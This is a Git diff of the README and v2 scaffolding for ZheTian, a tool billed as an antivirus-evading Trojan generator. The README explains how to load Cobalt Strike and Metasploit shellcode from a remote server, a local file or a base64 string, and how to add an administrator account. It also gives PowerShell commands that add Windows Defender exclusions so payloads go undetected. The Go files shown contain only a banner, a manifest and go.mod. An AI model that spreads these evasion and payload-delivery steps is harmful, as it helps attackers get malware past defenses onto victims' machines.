v2上线，全新的免杀方案，静态Bypass All.

README.md

@@ -1,27 +1,40 @@
-![my-logo.png](https://raw.githubusercontent.com/yqcs/ZheTian/master/images/logo.png "my-logo")
+![logo](images/logo.png)
+# ::ZheTian Powerful Anti Anti-Virus Trojan horse generator / 强大的免杀木马生成器
 
-# [ZheTian](https://github.com/yqcs/ZheTian/)
+## 全新V2上线，Bypass All.
 
-## ZheTian Powerful remote load and execute ShellCode tool，ShellCode免杀加载器
 
-### 命令：
+### V2版本支持Cobalt Strike、MSF原生Shellcode，无需任何处理即可直接使用，指令：
 
+> -o string：选中payload，向同级目录生成一个可执行程序（无需go语言环境）
+>
+> -m int：选择要生成的系统架构，参数选择32和64，默认选中了64
+> 
+系统依旧采用了“慢加载”方式，运行约十五秒后才开始执行上线操作
+
+![v2](images/v2.png)
+
+----
+
+### V1：
+![v1](images/v1.png)
+### 参数：
 > -u  string：从远程服务器加载base64混淆后的字符串。
 >
 > -r string：从本地文件内读。
 >
 > -s string：读取无修改的原始文件，只能从本地加载。
 >
->-o boolean：向userHome\tmp目录输出一次性可执行文件，体积比主程序小了五六倍，砍去了其他功能，只保留了ShellCode Loader
+> -o boolean：向userHome\tmp目录输出一次性可执行文件，体积比主程序小了五六倍，砍去了其他功能，只保留了ShellCode Loader
 >
->-n string：向管理员组创建用户，-n的参数即为账户，-p的参数为密码。需以管理员身份运行
+> -n string：向管理员组创建用户，-n的参数即为账户，-p的参数为密码。需以管理员身份运行
 >
->-c string：直接从命令行获取base64字符串。如：ZheTian -c ZmM0ODgzZTRmMGU4Yzg4YjUyMjA4YjQyM2M==...
+> -c string：直接从命令行获取base64字符串。如：ZheTian -c ZmM0ODgzZTRmMGU4Yzg4YjUyMjA4YjQyM2M==...
 >
 
-## 示例：
+#### 运行示例：
 
-### Base64字符串方式加载：
+#### Base64字符串方式加载：
 
 原始python代码：
 > buf = "\xfc\x48\x83\xe4\xf0\xe8\xc8\x8b\x52\x20\x8b\x42\x3c\x48\x01\xd0\x66\x81\x78\x18\x0b\x02\x75..."
@@ -42,22 +55,22 @@ c、ruby等同理，Java之流的则是去除  ", 0x"。注意，是逗号空格
 获取到base64字符串之后可以选择放到远程服务器加载，使用-u 命令即可。也可以放到本地文件内，或者直接使用-c命令以命令行方式运行。如：ZheTian.exe -c
 ZmM0ODgzZTRmMGU4Yzg4YjUyMjA4YjQyM2M0ODAxZDA2NjgxNzgxODBiMDI3NQ==
 
-### 原文件读取类型：
+##### 原文件读取类型：
 
 使用 `ZheTian -h `命令可查看支持的语言。推荐使用Java、py、C语言。原文件无需进行任何修改即可直接加载，但是不支持放在远程服务器，只能通过本地 -s
 命令读取，如： `ZheTian -s C:/Windows/Temp/payload.java`
 
-### 图示操作过程
+##### 图示操作过程
 
 先生成64位shellcode
 
-![my-logo.png](https://github.com/yqcs/ZheTian/blob/master/images/payload.jpg "my-logo")
+![payload](images/payload.jpg)
 
 然后根据需要的命令进行修改
-![my-logo.png](https://raw.githubusercontent.com/yqcs/ZheTian/master/images/code.png "my-logo")
+![code](images/code.png)
 
 下面执行示例：
-![my-logo.png](https://github.com/yqcs/ZheTian/blob/master/images/c.png "my-logo")
+![run](images/run.png)
 
 ### 编译：
 
@@ -68,7 +81,7 @@ ZmM0ODgzZTRmMGU4Yzg4YjUyMjA4YjQyM2M0ODAxZDA2NjgxNzgxODBiMDI3NQ==
 
 实现无窗口运行，但是360偶尔会识别为恶意程序
 
-#### 带图标编译：
+### 带图标编译：
 
 > 先执行：go get github.com/akavel/rsrc
 >
@@ -79,19 +92,19 @@ ZmM0ODgzZTRmMGU4Yzg4YjUyMjA4YjQyM2M0ODAxZDA2NjgxNzgxODBiMDI3NQ==
 > 更多介绍：https://blog.csdn.net/qq_38376348/article/details/108318880
 >
 
-## 扩展：windows defender
+## 扩展：Windows defender
 
 由于ZheTian的defender免杀效果不稳定，在此推荐一种方式，执行下面命令会分别向defender添加白名单：目录、进程、类型文件
 
 #### 需以管理员权限运行
 
 > powershell -Command Add-MpPreference -ExclusionPath "C:\tmp"
 >
->powershell -Command Add-MpPreference -ExclusionProcess "java.exe"
+> powershell -Command Add-MpPreference -ExclusionProcess "java.exe"
 >
->powershell -Command Add-MpPreference -ExclusionExtension ".java"
+> powershell -Command Add-MpPreference -ExclusionExtension ".java"
 >
 
-## 有问题可以提Issues，也可加微信联系
-
-![my-logo.png](https://raw.githubusercontent.com/yqcs/ZheTian/master/images/wx.jpg "my-logo")
+## 有问题加群反馈！！Issues 一概不处理！
+ 
+<img src="images/group.png" width="350">

v2/ZheTian.go

@@ -0,0 +1,23 @@
+package main
+
+import (
+	"fmt"
+)
+
+func main() {
+
+	fmt.Println(`
+▒███████▒ ██░ ██ ▓█████▄▄▄█████▓ ██▓ ▄▄▄       ███▄    █ 
+▒ ▒ ▒ ▄▀░▓██░ ██▒▓█   ▀▓  ██▒ ▓▒▓██▒▒████▄     ██ ▀█   █ 
+░ ▒ ▄▀▒░ ▒██▀▀██░▒███  ▒ ▓██░ ▒░▒██▒▒██  ▀█▄  ▓██  ▀█ ██▒
+  ▄▀▒   ░░▓█ ░██ ▒▓█  ▄░ ▓██▓ ░ ░██░░██▄▄▄▄██ ▓██▒  ▐▌██▒
+▒███████▒░▓█▒░██▓░▒████▒ ▒██▒ ░ ░██░ ▓█   ▓██▒▒██░   ▓██░
+░▒▒ ▓░▒░▒ ▒ ░░▒░▒░░ ▒░ ░ ▒ ░░   ░▓   ▒▒   ▓▒█░░ ▒░   ▒ ▒ 
+░░▒ ▒ ░ ▒ ▒ ░▒░ ░ ░ ░  ░   ░     ▒ ░  ▒   ▒▒ ░░ ░░   ░ ▒░
+░ ░ ░ ░ ░ ░  ░░ ░   ░    ░       ▒ ░  ░   ▒      ░   ░ ░ 
+  ░ ░     ░  ░  ░   ░  ░         ░        ░  ░         ░ 
+░
+:: ZheTian Powerful Anti Anti-Virus Trojan horse generator
+ //[Version 2.0.0] Github [http://github.com/yqcs/ZheTian]`)
+
+}

v2/ZheTian.manifest

@@ -0,0 +1,22 @@
+<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
+<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
+<assemblyIdentity
+    version="1.0.0.0"
+    processorArchitecture="x86"
+    name="controls"
+    type="win32"
+>
+</assemblyIdentity>
+<dependency>
+    <dependentAssembly>
+        <assemblyIdentity
+            type="win32"
+            name="Microsoft.Windows.Common-Controls"
+            version="6.0.0.0"
+            processorArchitecture="*"
+            publicKeyToken="6595b64144ccf1df"
+            language="*"
+        ></assemblyIdentity>
+    </dependentAssembly>
+</dependency>
+</assembly>

v2/go.mod

@@ -0,0 +1,3 @@
+module ZheTian
+
+go 1.18